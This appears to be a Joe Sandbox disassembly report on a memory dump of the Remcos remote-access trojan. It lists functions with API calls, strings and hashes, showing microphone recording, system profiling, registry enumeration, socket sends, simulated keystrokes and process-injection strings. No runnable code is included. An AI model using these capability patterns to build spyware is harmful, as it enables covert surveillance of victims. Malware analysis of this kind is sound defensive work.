                                                        APIs
                                                        • GetConsoleCP.KERNEL32 ref: 0044B47E
                                                        • __fassign.LIBCMT ref: 0044B4F9
                                                        • __fassign.LIBCMT ref: 0044B514
                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000), ref: 0044B559
                                                        • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000), ref: 0044B592
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                        • String ID: PkGNG
                                                        • API String ID: 1324828854-263838557
                                                        • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                        • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                        • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                        • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                        Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                        • Sleep.KERNEL32(00000064), ref: 0041755C
                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                        • API String ID: 1462127192-2001430897
                                                        • Opcode ID: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                        • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                        • Opcode Fuzzy Hash: 0d67962283f2148fab1b3333e93946e14c4c28236009ab2eda98070440fecb3d
                                                        • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                        Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 004074D9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CurrentProcess
                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                        • API String ID: 2050909247-4242073005
                                                        • Opcode ID: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                        • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                        • Opcode Fuzzy Hash: fabc3931959a25f7a31d3ecd74c529253d596e7bbbcd6e820e444b19b129e129
                                                        • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                        Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _strftime.LIBCMT ref: 00401D50
                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                        • API String ID: 3809562944-243156785
                                                        • Opcode ID: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                        • Instruction ID: 12771182903f202c4b9d99511a6abf0f0559d076e6e3c56183b1657b5f9df8bc
                                                        • Opcode Fuzzy Hash: 5ca57e464fc48cfd7ac60de242ae16507c8b77f4a1a81d17ad6b6b7cf7425d61
                                                        • Instruction Fuzzy Hash: AA318F315043019FC324EB22DC56A9E77A8FB84315F40443EF189A21F2EFB89A49CB5E
                                                        Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                        • int.LIBCPMT ref: 00410EBC
                                                          • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                          • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                        • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                        • __Init_thread_footer.LIBCMT ref: 00410F64
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                        • String ID: ,kG$0kG
                                                        • API String ID: 3815856325-2015055088
                                                        • Opcode ID: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                        • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                        • Opcode Fuzzy Hash: 9b6f417909eb5cd4a3a9238d92eaca8e17f16862a4fd72c37d6a1f751429c824
                                                        • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                        Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                        • waveInStart.WINMM ref: 00401CFE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                        • String ID: dMG$|MG$PG
                                                        • API String ID: 1356121797-532278878
                                                        • Opcode ID: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                        • Instruction ID: 1e392cdedf79dd274444ae0cc0b76d6cc185fd36309c60cea9b16e967c73269b
                                                        • Opcode Fuzzy Hash: eef3d83c920f1a8878cb9ae4af55a885980d63effcab8dea3858d63941c1ab5b
                                                        • Instruction Fuzzy Hash: 51212A71604201AFC7399F66EE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                        Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                          • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                          • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                          • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                        • TranslateMessage.USER32(?), ref: 0041D57A
                                                        • DispatchMessageA.USER32 ref: 0041D584
                                                        • GetMessageA.USER32 ref: 0041D591
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                        • String ID: Remcos
                                                        • API String ID: 1970332568-165870891
                                                        • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                        • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                        • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                        • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                        Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                        • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                        • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                        • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                        Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                        • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                        • __alloca_probe_16.LIBCMT ref: 00454014
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                        • __freea.LIBCMT ref: 00454083
                                                        • __freea.LIBCMT ref: 0045408F
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                        • String ID:
                                                        • API String ID: 201697637-0
                                                        • Opcode ID: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                        • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                        • Opcode Fuzzy Hash: 3cd8063f553076ce798424c5fc2191fe96cf15845bda9c8b0815eea935c1a584
                                                        • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                        Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                                          • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                          • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                                          • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                        • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                        • _free.LIBCMT ref: 00445515
                                                        • _free.LIBCMT ref: 0044552E
                                                        • _free.LIBCMT ref: 00445560
                                                        • _free.LIBCMT ref: 00445569
                                                        • _free.LIBCMT ref: 00445575
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$ErrorLast$_abort_memcmp
                                                        • String ID: C
                                                        • API String ID: 1679612858-1037565863
                                                        • Opcode ID: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                        • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                        • Opcode Fuzzy Hash: 57e83dca3a851dc1354698b3345e0422ed2f7d5811d10dab12b85ea15fb2e044
                                                        • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                        Function 00414945 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tcp$udp
                                                        • API String ID: 0-3725065008
                                                        • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                        • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                        • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                        • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                        Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __Init_thread_footer.LIBCMT ref: 004018BE
                                                        • ExitThread.KERNEL32 ref: 004018F6
                                                        • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                          • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                        • String ID: PkG$XMG$NG$NG
                                                        • API String ID: 1649129571-3151166067
                                                        • Opcode ID: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                        • Instruction ID: 94ec9d015e3317cd6a1a8c0f3f0e5257b1b149af30ff9c9aaa6ade548e88cebb
                                                        • Opcode Fuzzy Hash: 49aca21aedc77406ad6ecb676b3e8f12959c6e3be557b7633b64e8435ff40de0
                                                        • Instruction Fuzzy Hash: 7441D5312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D4AC71D
                                                        Function 0040799E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                        • MoveFileW.KERNEL32 ref: 00407AA5
                                                        • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                        • String ID: .part
                                                        • API String ID: 1303771098-3499674018
                                                        • Opcode ID: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                        • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                        • Opcode Fuzzy Hash: c438b6c3ad66c49b0c8fac277bcd0795076709a98bb5b529a829fc4e1ae4dc70
                                                        • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                        Function 004199DB Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendInput.USER32 ref: 00419A25
                                                        • SendInput.USER32(00000001,?,0000001C), ref: 00419A4D
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                        • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                        • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                          • Part of subcall function 004199CE: MapVirtualKeyA.USER32 ref: 004199D4
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InputSend$Virtual
                                                        • String ID:
                                                        • API String ID: 1167301434-0
                                                        • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                        • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                        • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                        • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                        Function 00444D7C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        • _free.LIBCMT ref: 00444E87
                                                        • _free.LIBCMT ref: 00444E9E
                                                        • _free.LIBCMT ref: 00444EBD
                                                        • _free.LIBCMT ref: 00444ED8
                                                        • _free.LIBCMT ref: 00444EEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _free$AllocateHeap
                                                        • String ID: KED
                                                        • API String ID: 3033488037-2133951994
                                                        • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                        • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                        • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                        • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                        Function 00413A90 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413BC6
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Enum$InfoQueryValue
                                                        • String ID: [regsplt]$xUG$TG
                                                        • API String ID: 3554306468-1165877943
                                                        • Opcode ID: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                        • Instruction ID: 25111a67c66830bda9a991cbd11294aa9b1843c944dfd5f4caafe5fa1545c2ae
                                                        • Opcode Fuzzy Hash: 0915e5250acf3bea082794a31251f109dca26ef8e60840e512c7265f34e5d9a1
                                                        • Instruction Fuzzy Hash: 05512D71900219AADB11EB95DC86EEEB77DAF04305F10007AE505B6191EF746B48CBA9
                                                        Function 00413D48 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.ADVAPI32 ref: 00413D81
                                                          • Part of subcall function 00413A90: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                          • Part of subcall function 00413A90: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413B26
                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00413EEF
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseEnumInfoOpenQuerysend
                                                        • String ID: xUG$NG$NG$TG
                                                        • API String ID: 3114080316-2811732169
                                                        • Opcode ID: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                        • Instruction ID: 39136fa66a1b3d14a29046baa0c8a2124f92290552efa608aac098e6c3039c27
                                                        • Opcode Fuzzy Hash: 7a7e2ed596e912e6ef42e947eeb9eb1de9ee6fb09b7a4cfd1d5d0db7cb7d7a08
                                                        • Instruction Fuzzy Hash: 03419F316042005AC324F726D852AEF76A99FD1384F40883FF549671D2EF7C5949866E
                                                        Function 004511AC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,000000FF,00000001,0043F918,?), ref: 004511F9
                                                        • __alloca_probe_16.LIBCMT ref: 00451231
                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451294
                                                        • __freea.LIBCMT ref: 0045129D
                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B50,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                        • String ID: PkGNG
                                                        • API String ID: 313313983-263838557
                                                        • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                        • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                        • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                        • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                        Function 0041B71B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32 ref: 00413678
                                                          • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                          • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                        • _wcslen.LIBCMT ref: 0041B7F4
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000001C.00000002.475610430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_28_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                                        • API String ID: 37874593-122982132
                                                        • Opcode ID: 6e4530202917b19cbbea06c57cde587f82f9719f354b1f28db5066e5f2e92548
                                                        • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
